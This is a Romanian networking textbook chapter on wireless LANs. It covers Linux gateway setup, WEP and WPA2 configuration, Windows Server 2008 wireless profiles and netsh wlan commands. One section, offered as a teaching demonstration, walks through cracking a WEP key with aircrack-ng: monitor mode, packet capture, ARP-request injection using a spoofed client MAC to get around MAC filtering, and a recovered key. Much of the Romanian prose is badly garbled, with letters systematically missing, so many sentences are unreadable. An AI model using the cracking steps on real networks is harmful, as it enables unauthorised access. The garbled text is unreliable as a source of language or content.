“taţia B dispu e şi de o legătu ă ăt e I te et de i a e i te feţe de eţea o tate şi

poate o u i a atât u staţia A, ât şi u î t eaga eţea WWW. Deşi staţia A u a e de ât o
i te faţa de eţea, t e uie să îi fie asigu ată şi a esteia o e ti itate î I te et. E istă, î
ge e al, două soluţii e se pot adopta î a eastă situaţie:
185 | W i r e l e s s
 se u pă ă u oute pe t u eţeaua lo ală şi se o e tează ele două staţii di e t la oute .

 se o figu ează staţia B a gateway/router pe t u staţia A.
“e a a aliza pe s u t a ia ta , ă i a ia ta p esupu e ai ult u efo t fi a ia ,

de ât u ul de o figu a e. ‘ezultatul u ă it poate fi des is astfel:
 staţia A t e uie să ştie să t i ită tot t afi ul desti at u ei staţii î I te et, ăt e staţia B. Cu
alte u i te, staţia A t e uie să o figu eze a gateway pe staţia B, folosi d o ută stati ă.
 staţia B a t e ui să t i ită pe i te faţa eth0 tot t afi ul p i it pe i te faţa wlan0 şi desti at
î I te et. pe t u a staţia A să poată t i ite pa hete î I te et
 staţia B a t e ui să t i ită pe i te faţa wlan0 tot traficul primit pe inte faţa eth0 şi desti at
staţiei A. pe t u a staţia A să poată p i i pa hete di I te et
Pe t u a putea ealiza a eastă o figu aţie este nevoie de un firewall Li u pe staţia B.

Ubuntu are deja inclus un firewall î li ie de o a dă u it iptables, însa utilizarea sa va fi
studiată ulte io î a eastă a te, ia î ţelege ea si ta ei iptables u este e esa ă î a est
apitol pe t u a ofe i o soluţie î p o le a de faţă.
Pe t u a o ţi e o po ta e tul do it, se va instala pachetul firestarter, un firewall
e t e de si plist. Co a dă pe t u i stala e este:
waters@myr:~$ sudo apt-get install firestarter
După i stala e, se poate po i p og a ul p i i t odu e ea firestarter & în linia de

o a dă. A esta a po i i t -un mod „wizard de o figu a e î a e a t e ui spe ifi ată
i te faţa di eţeaua lo ală şi i te faţa e du e sp e gateway. ‘estul o figu aţiei de firewall
a fi fă ută de ăt e Firestarter automat.
“e i di ă de i i te faţa sp e gateway:
şi i te faţa sp e eţeaua lo ală:

186 | ‘ e ţ e l e L o a l e
A ai ă as doa configurarea gateway-ului pe staţia A. Co a da de ai jos i di ă staţiei

A, să t i ită toate pa hetele desti ate î I te et, staţiei B.
waters@myr:~$ sudo route add default gw IP_wlan0_B
5.3.2 Configurări de securitate în wireless

Î se ţiu ea e u ează o fi p eze tate atât o figu aţiile pe lie t ât şi ele de pe u
router wireless Linksys.
5.3.2.1 Configurarea WEP
5.3.2.1.1 Configurarea routerului wireless

Configurarea routerului se face printr-o i te faţă WEB si plă a esată p i p oto olul
HTTP. Pe t u a putea i iţia î să o o e iu e HTTP i el la oute ul wireless, este nevoie de
o e ti itate de i el î t e staţie şi oute . Asigu a ea legătu ii de i el şi se poate fa e
p i aso ie ea u eţeaua i pli ită wireless p eze tă pe oute sau p i folosi ea u ui ablu
crossover pentru conectarea la unul din porturile de LAN. Routerele wireless Linksys, au activat
î od i pli it u se e DHCP e ofe ă o e ti itatea de i el p i ofe i ea u ei ad ese IP
di a eeaşi su eţea u IP-ul de management al routerului, folosit pe t u a esa ea i te feţei
WEB de o figu a e. Ad esa IP i pli ită p i a e se poate a esa i te faţa wireless a
routerelor wireless Linksys este 192.168.1.1.
5-12: Accesarea routerului prin HTTP

187 | W i r e l e s s
Co figu a ea WEP, pe oute , p esupu e de fapt alege ea lu gi ii heii şi ge e a ea

a esteia după o pa olă i t odusă:
5-13: Configurare WEP pe router wireless
5.3.2.1.2 Configurare clientului wireless

Pe client, tot e t e uie fă ut este adăuga ea li ie de o figu a e de ai jos î fişie ul
/etc/network/interfaces.
wireless-key s:7733-7031-7377-3361-6B
După epo i ea se i iului de eţea, se o ţi e o e ti itate u supo t WEP.

root@myr:/home/waters# iwconfig wlan0
wlan0 IEEE 802.11g ESSID:"test" Nickname:""
Mode:Managed Frequency:2.437 GHz Access Point: 00:1D:7E:4C:4F:1D
Encryption key:7733-7031-7377-3361-6B
Ate ţie! după u s-a p eze tat a te io î su apitolul de se u itate î eţele fă ă fi ,

se u itatea WEP este foa te uşo de o p o is; u utilizato o ştie t de a est is u a
t e ui să foloseas ă i iodată a est tip de ipta e, de ât da ă do eşte să îşi spa gă p op ia
eţea, î s op didactic.
5.3.2.2 Configurarea WPA2 Personal

“ta da dul de se u itate e o a dat pe t u eţele fă ă fi de tip i f ast u tu ă este
. i, u os ut şi su u ele de WPA . Co figu a ea se a fa e a şi î azul WEP, atât pe
AP ât şi pe lie t.
5.3.2.2.1 Configurarea routerului

Co figu a ea WPA se poate fa e u p oto olul TKIP sau AE“, a â d g ijă a alege ea u eia di
opţiu i să se efle te şi î setă ile ealizate pe lie t.
188 | ‘ e ţ e l e L o a l e
5-14: Configurarea WPA2 pe un router wireless
5.3.2.2.2 Configurarea clientului wireless

Pe t u lie t, se a ealiza o o figu a e pe siste tă a eţelei pe t u supo t WPA . Î a est
se s a t e ui editat fişie ul /etc/network/interfaces pentru a reflecta schimbarea
nivelului de securitate.
Ate ţie! da ă o figu aţia e u ează se ealizează pe o pla ă wireless Ralink (driver
RTxxx), va trebui instalat driverul NDISwrapper în locul celui Serialmonkey, prezent în Linux.
“upo tul WPA a fi adăugat folosi d u utilita î li ie de o a dă u it
wpasupplicant. Se va instala mai întâi pachetul pentru acest utilitar:
waters@myr:~$ sudo apt-get install wpasupplicant
Pe t u a se putea ealiza aso ie ea u o eţea WPA , î fişie ul de o figu a e a t e ui

i t odusă heia pa tajată WPA a e a fost setată şi pe AP. P o le a este ă
/etc/network/interfaces are drept de read implicit pentru orice utilizator din sistem.
Degeaba s-ar oferi se u itate WPA eţelei, da ă pa ola a fi i t odusă î te t la î t -u fişie
de configurare pe care oricine îl poate consulta. În acest punct intervine wpasupplicant prin
ofe i ea u ui utilita u ajuto ul ă uia se poate ge e a u hash de 64 caractere, care poate fi
ulte io i t odus î fişie ul interfaces. A est utilita se u eşte wpa-passphrase, iar pentru
a genera hash-ul are nevoie la intrare de SSID-ul eţelei şi de heia pa tajată a eţelei.
root@myr:/home/rl# wpa_passphrase YoGi p1d@n3t$s5p^a7
network={
ssid="YoGi"
#psk="p1d@n3t^a7"
psk=a8a9c6966946c520a16d020e7590d1ad35d4de60332a22d7349264007194b0e9
}
Alătu i de heia pa tajată, î fişie ul de o figu a e o ai t e ui adăugate u ătoa ele

directive:
 wpa-driver – spe ifi ă d i e ul folosit. Da ă u s-a instalat un driver cu ajutorul NDISwrapper,
se va folosi parametrul wext (Linux wireless extensions); acesta este driverul generic instalat de
Linux.
 wpa-ssid – spe ifi ă ““ID-ul eţelei.
 wpa-ap-scan – p i eşte pa a et ul , da a eţeaua a e ““ID broadcast a ti at, şi pa a et ul
2, în caz contrar.
 wpa-proto – versiunea protocolului. Parametrii pot fi WPA2 sau WPA.
 wpa-pairwise, wpa-group – a este două di e ti e p i es a elaşi tip de pa a et u, a e
spe ifi ă p o olul de ipta e folosit. Valo ile pot fi:
1. CCMP pentru AES
2. TKIP pentru TKIP (asigura compatibilitatea WPA2 cu WPA)
 wpa-key-mgmt – este folosit pe t u a i di a etoda de aute tifi a e folosită. A eptă
parametrii:
1. WPA-P“K î azul aute tifi ă ii pe ază de heie pa tajată
2. WPA-EAP î azul aute tifi ă ii pe aza u ui se e spe ializat ‘ADIU“, TACACS+)
189 | W i r e l e s s
 wpa-psk spe ifi ă heia pa tajată su fo ă de hash – a eptă a pa a et u hash-ul generat

anterior cu wpa_passphrase
Co fo spe ifi aţiilo de ai sus, fişie ul de o figu a e pe t u eţeaua test a ată astfel:
auto wlan0
iface wlan0 inet dhcp
wpa-driver wext
wpa-ssid YoGi
wpa-ap-scan 1
wpa-proto WPA2
wpa-pairwise CCMP
wpa-group CCMP
wpa-key-mgmt WPA-PSK
wpa-psk a8a9c6966946c520a16d020e7590d1ad35d4de60332a22d7349264007194b0e9
5.3.2.3 Co pro iterea u ui siste pe ază de heie WEP

Înainte de a începe compromite ea efe ti ă, t e uie luate î o side a e âte a
a a te isti i pe a e WEP le deţi e. Î p i ul â d, WEP foloseşte pe t u ipta ea datelo u
algo it de ipta e si et i ă de u it ‘C , folosi d pe t u ipta ea şi de ipta ea datelo ,
chei pe 40 sau de iţi. Cheile su t u os ute de AP Access Point şi de toate odu ile
ă o a li se pe ite aso ie ea.
IV (Initialization Vector ep ezi tă u u ă pe de iţi, ge e at aleato de fie a e
staţie e do eşte să t a s ită şi a e î p eu ă u heia pa tajată a ge e a heia ‘C . A esta
este t a s is î la u fie a e pa het desti aţiei. Vul e a ilitatea a estui p oto ol p o i e
to ai di folosi ea a esto e to i de i iţializa e. Cu o lu gi e de u ai de iţi, î t -o
eţea wireless î a e e istă u t afi susţi ut, WEP pâ ă la u ă a folosi a eeaşi e to i de
i iţializa e pe t u dife ite pa hete. A easta ezultă î pa hete e au şi u i ge e ate de ăt e
‘C foa te ase ă ătoa e.
Î o luzie, da ă e istă destul de ulte IV-uri capturate, este posi ilă afla ea heii WEP.
Modul managed sau ad hoc al d i e ului u supo tă î să aptu a de pa hete fă ă a lie tul să
fie aso iat u u AP. Pe t u a fa e posi ilă aptu a t e uie a pla a de eţea să fie setată î
modul Monitor.
waters@myr:~$ sudo ifconfig wlan0 down
waters@myr:~$ sudo iwconfig wlan0 mode Monitor
waters@myr:~$ sudo ifconfig wlan0 up
Captu a pa hetelo şi spa ge ea heii WEP se o ealiza u pa hetul aircrack-ng. Acesta

se poate instala folosind utilitarul apt î li ie de o a dă:
waters@myr:~$ apt-get install aircrack-ng
Pa hetul i lude u ătoa ea suită de utilitare:

 airodump – fa e posi ila aptu a de pa hete şi i pli it de alo i IV
 aircrack – folosit pentru analiza capturii de IV-u i si găsi ea heii WEP
 airreplay – acesta este un packet injector. Cu ajuto ul său se poate ge e a t afi la a e AP-
ul să fie o ligat să ăspu dă u pa hete e i lude alo i IV.
Î s e a iul e u ează se a folosi ai î tâi airodump pentru a captura pachetele din

eţea î t -u fişie de pe dis . Asup a acestuia se va aplica aircrack pentru a analiza vectorul
de IV şi a găsi pa ola.
Odată setat odul Monitor, se poate porni captura de pachete cu airodump. Ca
parametri se vor folosi:
 -t: spe ifi ă tipul de pa hete iptate e t e uie aptu at. Valo ile posibile sunt WEP, WPA,
WPA2.
 -b: spe ifi ă a da î a e fu ţio ează eţeaua wireless
190 | ‘ e ţ e l e L o a l e
 -w: spe ifi ă u ele fişie ul î a e se a a aliza aptu a

 -c: pe t u p e iza ea a alului a e a fi s a at. Da ă u se p e izează a alul s a a ea se a
face pe toate canalele
Notă: se p esupu e ă i fo aţii p e u a da sau a alul pe a e eţeaua fu ţio ează
au fost aflate anterior printr-o s a a e si plă u utilita ul iwlist.
waters@myr:~$ sudo airodump-ng -t WEP -b g -c 11 -w capture wlan0

[ CH 11 ][ Elapsed: 53 s ][ 2008-08-05 11:57
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ES
00:1D:7E:4C:4F:1D 0 100 523 50 1 11 54. WEP WE l
BSSID STATION PWR Rate Lost Packets Probes

00:1D:7E:4C:4F:1D 00:1D:D9:5D:8F:00 0 54-54 2 235
Deşi aptu a de ai sus a fost lăsată ulâ d i ute, se poate o se a ă u ă ul de

pa hete t a s is de staţia u ad esa MAC : D:D : D: F: a fost doa . Pe t u a putea
spa ge o heie WEP de iţi u o p o a ilitate de % a fi e oie a i dicatorul de date
utile(#Data să fie el puţi ia u ă ul de pa hete el puţi la fel de a e. Di
pă ate, o e ta , î eţeaua de ai sus u a e lo foa te ult t a sfe de date. Deşi s-ar
putea aştepta pâ ă â d a ti itatea de pe ediu a fi e a mai mare, pachetul aircrack-ng
ofe ă o etodă ai apidă.
Folosind utilitarul airepaly, se pot trimite pachete ARP request la care AP-ul este obligat
să ăspu dă. Di pa hetele de A‘P reply se pot captura IV-u ile de a e este e oie. Î să AP-ul
u a ăspu de i iodată la u request e i e de la o ad esa MAC de u este aso iată eţelei.
Di a est oti , pe t u a a est ata sa fu ţio eze, pachetele ARP vor trebui trimise cu un
MAC su să pe a e AP-ul îl u oaşte î ta ela sa A‘P.
Una din cele mai importa te statisti i di ezultatul pe a e îl ofe ă o a da airodump-
ng, este u ta el al staţiilo aso iate deja la eţea e o ţi e şi ad esele MAC ale a esto staţii.
Astfel se a folosi d ept MAC su să u ul di t e MAC-u ile statiilo o ţi ute a te io .
Sintaxa comenzii aireplay e a fi folosită î a est az este:
aireplay-ng <tipul pachetelor injectate> -b <Adresa MAC a AP-ului> -h <Adresa MAC a unui
lie t aso iat> <i te faţa de eţea>
Tipul pachetelor ARP request este ide tifi at de u ă ul . Pe t u ai ulţi pa a et ii şi
mai multe tipuri de pachete ce pot fi generate, se va consulta pagina man a utilitarului. Se
poate deci porni injectarea de pachete astfel:
waters@myr:~$ sudo aireplay-ng -3 -b 00:1D:7E:4C:4F:1D -h 00:1D:D9:5D:8F:00 wlan0
Notă: în ata ul de ai sus, u o tează da ă AP-ul a e o figu ată se u itate azată pe

filt a e de ad ese MAC, ă i pe t u pa hetele ARP se foloseşte a ad esa su să, o ad esă deja
aso iată, efilt ată.
A u ă s-a generat destul trafic, pentru decriptarea pachetelor de date capturate se va
folosi utilitarul aircrack-ng, specificându-i u ele fişie ului î a e s-au salvat datele
capturate.
waters@myr:~$ sudo aircrack-ng capture.cap
Opening capture.cap
[...]
KEY FOUND! [ AA:BB:CC:DD:EE ]
Probability: 100%
191 | W i r e l e s s
5.4 Wireless în Windows Server 2008

Wi do “e e i e u o ultitudi e de s hi ă i şi î u ătăţi i di se ia
protocoalelor 802.11. Suportul pentru wireless este a u ati , î p eu ă u o a hite tu ă de
implementare care aduce mari î u ătăţi i i te feţei de pe pa tea utilizato ului, ofe ă
posibilitatea stabilirii de politici de grup pentru conexiunile wireless, apa ilităţi de
auto o figu a e. De ase e ea, supo tă sta da dul de se u itate WPA Wi-Fi Protected
Access 2). Sistemul încorporat de suport pentru wireless se i teg ează a u u NAP1 la
aute tifi a ea p i . , ofe ă posi ilitatea de diag osti a e şi supo tă o figu a ea di li ie
de o a dă.
Aplicabilitate. Cu e epţia etodei pe t u a ti a ea se i iului wireless, expli ată ai jos,
ajo itatea p o edu ilo şi utilita elo des ise î o ti ua e se apli ă deopot i ă pe t u
Windows Server 2008 ât şi pe t u Wi do s Vista.
5.4.1 Activarea serviciului Wireless în Windows Server 2008

În general, la instalarea sistemului, Windows Server 2008 va instala automat driver-ele
pe t u ajo itatea e hipa e telo de eţea. I te feţele e u su t i iodată o figu ate
automat sunt cele wireless. De asemenea, în cele mai multe dintre cazuri, nici instalarea
a uală a d i e elo pe t u a este o po e te u a euşi. A est lu u se î tâ plă deoa e e
apa ilităţile de wireless ale lui Windows Server 2008 sunt cumulate într-un serviciu wireless,
i a ti î od i pli it. Odată a ti at, a est se i iu se a o upa atât de a age e tul
conexiunilor wireless ât şi de e t aliza ea p ofilu ilo a e o pe ite o e ta ea
utilizato ilo la eţele wireless. I stala ea se i iului e posi ilă i dife e t de p eze ţa u ei
i te feţe wireless în sistem.
Pe t u a a ti a apa ilităţile de wireless ale lui Windows Server 2008 este e esa ă
instalarea acestora ca feature al siste ului de ope a e. Pe t u a easta, se e e ută paşii
u ăto i:
 Din meniul Start > Administrative Tools > Server Manager sau direct din Quick
Launch se po eşte Server Manager în subcategoria Features şi se lo alizează Wireless LAN
Service în lista de feature-uri.
 “e apasă pe Next şi se o fi ă i stala ea:
 O i stala e te i ată u su es a afişa u ăto ul esaj, la atego ia Results:
5-15: Instalarea serviciului de Wireless ter i ată u su es
5.4.2 Configurarea profilurilor wireless

O o e iu e o figu aţă la o eţea wireless este de u ită u profil wireless. Modalităţile
p i a e a este p ofilu i pot fi o figu ate su t u ătoa ele:
1
Network Access Protection: http://technet.microsoft.com/en-us/network/bb545879.aspx
192 | ‘ e ţ e l e L o a l e
 Fereastra Connect to a network, p i ipala etodă a esi ilă utilizato ilo i di iduali pe t u a-
şi o figu a o e iu ea la o eţea wireless
 Politici de grup (Group policy) accesibile administratorilor într-un mediu Active Directory1
pe t u a o figu a e t alizat şi a dist i ui o figu aţia alto al ulatoa e e e ale
domeniului.
 Li ie de o a dă, folosind utilitarul netsh.exe şi o a da netsh wlan, ce permite
o figu a ea a uală a eţelelo wireless. Netsh permite, de asemenea, exportarea
profilurilor wireless în fişie e l şi i po ta ea lo ulte ioa ă, e e tual pe alte siste e.
5.4.3 Conectarea la o reţea wireless

A esa ea i te feţei Connect to a network poate fi ealizată î ai ulte odu i:
 Din fereastra Manage network connections, a esi ilă di Control Panel > Network and
sharing center > Manage network connections.
 Din meniul de Connect/Disconnect al ferestrei Manage Wireless Connections, a esi ilă la
Control Panel > Network and sharing center > Manage wireless
connection.
 Da ă este p eze t, p i li pe pi tog a a Network din System Tray, u at de li pe opţiu ea
Connect or disconnect...
 Doar pe Windows Vista, p i a esa ea opţiu ii Connect to... din meniul Start.
5-16: Starea conexiunilor (System Tray > Network)
1
http://www.microsoft.com/windowsserver2008/en/us/active-directory.aspx
193 | W i r e l e s s
5-17: Fereastra "Connect to a network"
Fereastra Connect to a network î lo uieşte e hea fe east ă de Choose a wireless network

di Wi do s XP “P . A easta supo tă a u şi o e iu ile VPN Virtual Private Network)
p e u şi o e iu ile de tip dial-up, inclusiv PPPoE (Point-to-Point Protocol over Ethernet).
Pe t u o e ta ea la u a di t e eţelele di listă, este sufi ie t u du lu- li pe eţeaua do ită
sau sele ta ea ei şi apăsa ea pe Connect. Da ă s-a co figu at o eţea de tip non-broadcasting,
a easta a apă ea î listă su u ele de Unnamed network iar încercarea de conectare la ea
a e e i t odu e ea u elui eţelei1.
Pe t u ea ea u ei oi o e iu i, di fe east a de ai sus se alege opţiu ea Set up a
connection or network.
5-18: Alegerea tipului de o e iu e e a fi reată
Pe t u o e ta ea la o eţea non-broadcasting la pasul precedent se alege Manually

connect to a wireless network şi se o pletează pa a et ii eţelei:
Ate ţie! Da ă opţiu ea Ma uall o e t to a wireless et o k u este dispo i ilă, se
e o a dă e ifi a ea i stală ii o e te a adapto ului wireless şi ide tifi a ea o e tă a sa di
fereastra Manage network connections.
1
Dete ta ea u ei eţele wireless o oad asti g este posi ilă deoa e e u ele AP-uri pot fi configurate
astfel î ât să t i ită ad e de tip beacon având câmpul de SSID setat pe valoarea NULL. Mai multe detalii despre
cadrele beacon la http://en.wikipedia.org/wiki/Beacon_frame.
194 | ‘ e ţ e l e L o a l e
5-19: Co figurarea para etrilor pe tru o rețea wireless non-broadcasting
I fo aţiile e ute pe t u o e ta e su t u ătoa ele:

 Network name: ep ezi tă ““ID-ul eţelei
 Security type: descrie metoda de autentificare î eţea. “u t pe ise:
 No authentication (open)
 WEP
 WPA:
o Personal
o Enterprise
 WPA2:
o Personal
o Enterprise
 802.1x: autentificare IEEE 802.1x cu WEP (dynamic WEP)
Autentificarea de tip shared key u este i lusă î listă. A easta poate fi o figu ată
ulterior da Mi osoft u e o a dă utiliza ea ei deoa e e ofe ă u i el e t e de s ăzut de
securitate.
 Encryption type ep ezi tă etoda folosită pe t u ipta ea ad elo de date t i ise î eţea.
Opţiu ile dispo i ile depi d de etoda aleasă de aute tifi a e:
o Pentru No authentication (open) se poate selecta None
o Pentru autentificarea WEP şi 802.1x se poate selecta WEP
o Pentru diverse variante WPA se poate selecta TKIP sau AES.
Opţiu ile dispo i ile la ipta e depi d, de ase e ea, şi de apa ilităţile i te feţei de
eţea wireless şi a d i e ului pe a e a easta îl foloseşte.
 Security key / Passphrase: Se introduce cheia WEP î azul se u ităţii de tip WEP, cheia
partajata WPA sau WPA2 pentru variantele Personal ale acestora, iar pentru variantele
Enterprise şi 802.1x, heia se dete i ă auto at la ealiza ea aute tifi ă ii.
 Start this connection automatically: Wi do s se a o e ta auto at la eţea â d a easta
este dete tată. Altfel, o e ta ea t e uie fa ută a ual p i fe east a Connect to a network.
195 | W i r e l e s s
 Connect even if the network is non broadcasting: Wi do s a î e a să se o e teze la eţea

hia şi â d a easta u îşi a u ţă ““ID-ul prin broadcast. Se vor trimite cadre de tip probe
request1 e ep ezi tă u is de se u itate deoa e e a estea o ţi u ele eţelei ăutate.
5-20: Noua rețea wireless adăugată u su es
După o e ta ea u su es la eţeaua spe ifi ată, Wi do s o a afişa î fe east a Connect

to a network. Di e a ul de o fi a e a eă ii oii eţele se poate alege opţiu ea Change
connection settings, e a pe ite odifi a ea pa a et ilo de se u itate şi de o e ta e
auto ată. Tot ai i, la se ţiu ea de se u itate, se poate alege opţiu ea Shared edispo i ilă la
e ea eţelei , deşi u este e o a dată dato ită se u ităţii s ăzute.
Î fu ţie de tipul de se u itate ales, se o figu ează fie o heie de aute tifi a e fie o
etodă de aute tifi a e î eţea. Î azul di u ă, de i la o figu a ea u ei aute tifi ă i de
tip WPA-Enterprise, WPA2-Enterprise sau 802.1x, su t e esa e şi u ătoa ele o figu ă i
ulterioare:
 Choose a network authentication method: “e alege o etodă EAP Extensible Authentication
Protocol şi se apasă Settings pentru a configura tipul de EAP ales.
 Cache user information for subsequent connections to this network: Opţiu e a e spe ifi ă
faptul ă, atu i â d utilizato ul se de o e tează di siste , datele folosite pe t u
aute tifi a e îi o fi sau u şte se di registry. Î azul î a e su t şte se, datele o fi e ute
di ou la fie a e aute tifi a e î eţea.
5.4.4 Managementul conexiunilor wireless

După ea ea şi/sau dete ta ea u su es a eţelelo wireless, managementul acestora
poate fi realizat dintr-o i te faţă spe ializată pusă la dispoziţie de Windows Server 2008 şi
a esi ilă p i Control Panel > Network and sharing center > Manage wireless
networks.
1
Mai multe detalii despre tipurile de cadre în wireless la adresa:
http://www.wi-fiplanet.com/tutorials/article.php/1447501
196 | ‘ e ţ e l e L o a l e
5-21: Fereastra Manage wireless networks
În fereastra Manage wireless networks pot fi izualizaţi pa a et ii u a e au fost

o figu ate eţelele wireless, li se pot odifi a p op ietăţile şi, i eî ţeles, pot fi şte se sau
adăugate oi p ofilu i wireless. De asemenea, tot de aici se pot rearanja în ordinea
p efe i ţelo p ofilu ile wireless o figu ate, o di e folosită de ăt e Wi do s atu i â d
su t dete tate u a sau ai ulte eţele wireless.
Deşi a age e tul eţelelo wireless poate fi realizat prin i te faţa Ma age i eless
connections, conexiunea wireless u e tă poate fi o figu ată şi p i i te faţa Manage
network connections, u dife e ţa ă a easta a afişa toate tipu ile de o e iu i p eze te î
siste , atât ele dete tate auto at u a fi i te feţele Ethernet ât şi ele o figu ate
manual (spre exemplu, conexiuni Bluetooth sau PPPoE), exemplificate în imaginea 5-22:
5-22: Fereastra Manage network connections
5.4.5 Conexiuni wireless ad hoc

O eţea ad hoc1 ai este de u ită şi eţea computer-to-computer, deoarece
calculatoa ele se o e tează di e t, fă ă a ai folosi dispoziti e i te edia e a hu u i,
s it hu i sau oute e. A a tajul u ei eţele wireless ad hoc este ă poate fi i stalată p a ti
1
De fapt, o eţea ad ho p esupu e o eţea wireless şi u a e se s î alt o te t.
197 | W i r e l e s s
o iu de u destul de ultă uşu i ţă, poate fi folosită î o i e s op pa taja ea fişie elo , jo u i

î eţea şi pe ite hia şi pa taja ea u ei o e iu i la I te et.
Pe t u a ea o eţea ad ho î Windows Server 2008, se u ează se e ţa u ătoa e de
paşi:
1. “e des hide i te faţa Connect to a network p eze tată î 5.4.3)
2. Se alege Set up a connection or network
3. Din lista tipurilor de conexiuni disponibile, se alege Set up an ad hoc (computer-to-computer)
network şi se apasă Next.
5-23: Co figurarea u ei rețele ad ho
4. Î fe east a u ătoa e se o pletează u ele ““ID-ul eţelei, se alege tipul de se u itate

i ple e tată u o i e pla ă wireless supo tă WPA î od ad hoc şi se i t odu e
passphrase-ul eţelei.
5-24: Rețeaua ad ho reată u su es
5. Wi do s a u ţă faptul ă eţeaua a fost eată u su es. Noua eţea apa e a u î i te faţa

Connect to a network ia siste ul se o e tează auto at la ea.
5-25: Rețeaua ad ho ou reată, î i terfața Connect to a network

198 | ‘ e ţ e l e L o a l e
Ate ţie! După u s-a e ţio at ai sus, după ea ea u ei eţele wireless sistemul se
o e tează auto at la ea, eea e i pli ă faptul ă o i e altă o e iu e wireless ce era a ti ă
î a el o e t a fi de o e tată.
Da ă u se ifează opţiu ea Save this network (figura 5-23 p ofilul eţelei ou eate a fi
şte s auto at î o e tul î a e ulti ul lie t se de o e tează de la ea sau când cel care a
eat eţeaua se de o e tează sau iese di aza elo lalto lie ţi.1
5.5 Administrarea în linie de comandă şi PowerShell

5.5.1 Managementul serviciului wireless prin netsh wlan
netsh este un utilitar disponibil în versiunile de Windows 2000, XP, 20 şi /Vista.
Netsh.exe poate fi folosit pe t u o figu a ea i te feţelo de eţea, a p oto oalelo de uta e,
poate apli a filt e, poate odifi a ute şi poate seta o ultitudi e de pa a et i ai i te feţelo
de eţea.
Parametrul wlan ep ezi tă u „co te t al o e zii netsh şi este folosit î p eu ă u
a easta pe t u a efe tua odifi ă i asup a o figu aţiilo eţelelo wireless.
Pentru a folosi comanda, se introduce netsh wlan fie î p o ptul de o a dă cmd.exe,
fie în PowerShell.
5.5.1.1 Co e zi de tip sho

Pe t u o listă o pletă a pa a et ilo e pot fi folosiţi î p eu ă u fo a show a netsh
wlan, se introduce una dintre comenzile:
PS C:\Users\Administrator> netsh wlan show
PS C:\Users\Administrator> netsh wlan show ?
O se ie i po ta tă de i fo aţii su t oferite de comanda netsh wlan show drivers;

o a da afişează apa ilităţile d i e ului i te feţei wireless instalate în sistem. Se pot
identifica tipurile de standarde suportate, protocoalele de securitate ce pot fi folosite, precum
şi i fo aţii desp e driverul propriu-zis. Opţio al, se poate adăuga o e zii pa a et ul
interface, cu sintaxa interface=”Wireless Network Connection”, p i a e se spe ifi ă o
a u ită i te faţă wireless:
PS C:\Users\Administrator> netsh wlan show drivers
Interface name: Wireless Network Connection
Driver : Dell Wireless 1390 WLAN Mini-Card

Vendor : Broadcom
Provider : Broadcom
Date : 10/12/2007
Version : 4.170.25.17
[...]
Type : Native Wi-Fi Driver
Radio types supported : 802.11g 802.11b
FIPS 140-2 mode supported : No
Authentication and cipher supported in infrastructure mode:
Open None
Open WEP
Shared None
Shared WEP
WPA2-Enterprise TKIP
WPA2-Personal TKIP
WPA2-Enterprise CCMP
WPA2-Personal CCMP
Unknown TKIP
1
Puteţi iti u a ti ol i te esa t desp e pe i olele eţelelo ad ho la
http://www.windowsecurity.com/whitepapers/Dangers-Ad-Hoc-Wireless-Networking.html
199 | W i r e l e s s
Unknown CCMP
WPA-Enterprise TKIP
WPA-Personal TKIP
WPA-Enterprise CCMP
WPA-Personal CCMP
Authentication and cipher supported in ad-hoc mode:
WPA2-Personal CCMP
Open None
Open WEP
[...]
5-26: Capa ilitățile i terfeței wireless
Pe t u afişa ea i te feţelo wireless di siste î o te tul eţelelo la a e a estea su t

o e tate, se foloseşte o a da netsh wlan show interfaces:
PS C:\Users\Administrator> netsh wlan show interfaces
There is 1 interface on the system:
Name : Wireless Network Connection

Description : Dell Wireless 1390 WLAN Mini-Card #3
GUID : 6fe1ef65-14ac-4a72-bf4b-52a821535ace
Physical Address : 00:19:7e:11:91:64
State : connected
SSID : DLINK_WIRELESS
BSSID : 00:19:5b:22:31:a4
Network Type : Infrastructure
Radio Type : 802.11g
Authentication : Open
Cipher : None
Connection Mode : Auto Connect
Channel : 6
Receive Rate (Mbps) : 54
Transmit Rate (Mbps) : 54
Signal : 60%
Profile : DLINK_WIRELESS
Pe t u afişa ea listei eţelelo wireless configu ate, e hi ale tul listei o ţi ute p i
i te faţa Connect to a network, se poate folosi comanda netsh wlan show profiles:
PS C:\Users\Administrator> netsh wlan show profiles
Profiles on interface Wireless Network Connection:
Group Policy Profiles (read only)
---------------------------------
<None>
User Profiles
-------------
All User Profile : DLINK_WIRELESS
All User Profile : ccielab
All User Profile : nnet
Afişa ea u ei liste a eţelelo wireless detectate se face prin comanda netsh wlan show
networks:
PS C:\Users\Administrator> netsh wlan show networks
Interface Name : Wireless Network Connection
There are 5 networks currently visible.
SSID 1 : YoGi
Network type : Infrastructure
Authentication : WPA-Personal
Encryption : CCMP
SSID 2 : ccielab
Authentication : WPA2-Personal
Encryption : CCMP
SSID 3 : Bee
Authentication : Open
Encryption : WEP
[...]
200 | ‘ e ţ e l e L o a l e
Comanda netsh wlan show ai supo tă pa a et i a autoconfig, blockednetworks,

filters, settings, tracing. Pe t u a afişa toate i fo aţiile dispo i ile pe t u toate
i te feţele wireless şi toate eţelele, dete tate sau o figu ate, se foloseşte pa a et ul all:
netsh wlan show all
5.5.1.2 “al area, î ăr area şi ştergerea profilurilor

Netsh ofe ă posi ilitatea e po tă ii î fişie e l a o figu aţiilo eţelelo wireless. Pentru
a exporta o astfel de o figu aţie se foloseşte si ta a o e zii netsh wlan export profile
folder= u u ăto ii pa a et i:
 folder = ale şi u e fişie ; poate fi o ale a solută sau elati ă
 name = opţio al, numele profilului de exportat
 interface = opţio al, numele interfeţei pe care profilul este configurat
Da ă se i lude pa a et ul name, atu i se a e po ta doa u si gu p ofil. Da ă se
spe ifi ă pa a et ul interface, se sal ează toate p ofilu ile o figu ate pe a ea i te faţă.
Lipsa parametrului interface are ca efect exportarea tuturor profilurilor din sistem.
Exemplu de utilizare, cu salvarea profilurilor în directorul curent (.):
PS C:\Users\Administrator> netsh wlan export profile folder=.
Interface profile "DLINK_WIRELESS" is saved in file ".\Wireless Network Connection-
DLINK_WIRELESS.xml" successfully.
Interface profile "ccielab" is saved in file ".\Wireless Network Connection-ccielab.xml"
successfully.
Interface profile "nnet" is saved in file ".\Wireless Network Connection-nnet.xml"
successfully.
Î ă a ea o figu aţiilo di fişie ele l e po tate se fa e p i utiliza ea pa a et ului

add profile, a î u ăto ul e e plu:
netsh wlan add profile filename= C:\"my_wlan_profile.xml" user=all interface= "Wireless
Network Adapter"
